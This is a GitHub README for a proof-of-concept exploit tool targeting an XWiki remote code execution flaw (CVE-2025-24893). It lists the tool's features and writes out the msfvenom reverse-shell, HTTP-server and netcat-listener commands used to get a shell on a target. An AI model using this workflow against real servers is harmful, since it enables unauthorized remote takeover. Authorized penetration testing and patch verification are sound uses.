Skip to content

Infinit3i/CVE-2025-24893

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

20 Commits
 
 
 
 
 
 

Repository files navigation

XWiki CVE-2025-24893 Proof of Concept

Authors: Net.Doge & Infinit3i


CVE-2025-24893 Picture



Twitter Follow


This Python script exploits CVE-2025-24893, a remote code execution (RCE) vulnerability in XWiki caused by improper sandboxing in Groovy macros rendered asynchronously. It allows arbitrary command execution through injection into RSS-based SolrSearch endpoints.

📌 Features

  • Single command execution via Groovy injection
  • Automatic reverse shell payload generation (with msfvenom)
  • Option to customize:
    • Remote target
    • Local IP address
    • HTTP server port
    • Reverse shell beacon port
  • Clean bash payload previews
  • ANSI color-coded interactive TUI

🚀 Usage

  1. Clone or download the script.

  2. Make sure you have the following installed:

    • msfvenom from Metasploit
    • Python 3
    • jq (used in the bash payloads)
  3. Run the script:

python3 CVE-2025-24893-PoC.py
  1. Select from the menu:

    • Run Command – Execute any shell command remotely.
    • Reverse Shell – Generate and deploy an ELF reverse shell to the target.
    • Change Settings – Modify LHOST, RHOST, server port, or beacon port.

🧪 Reverse Shell Workflow

  1. Payload is generated:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<beacon_port> -f elf -o rev
  1. You are prompted to start a Python HTTP server and netcat listener:
python3 -m http.server 8080
nc -lvnp 31337
  1. The script sends the following sequence to the target:

    • Download payload
    • Make it executable
    • Execute the binary

⚠️ Disclaimer

This tool is for educational and authorized testing purposes only. Unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical.

📄 Reference

About

PoC exploits CVE-2025-24893 , a remote code execution (RCE) vulnerability in XWiki caused by improper sandboxing in Groovy macros rendered asynchronously. It allows arbitrary command execution through injection into RSS-based SolrSearch endpoints.

Topics

Resources

Stars

Watchers

Forks

Packages

 
 
 

Contributors

Languages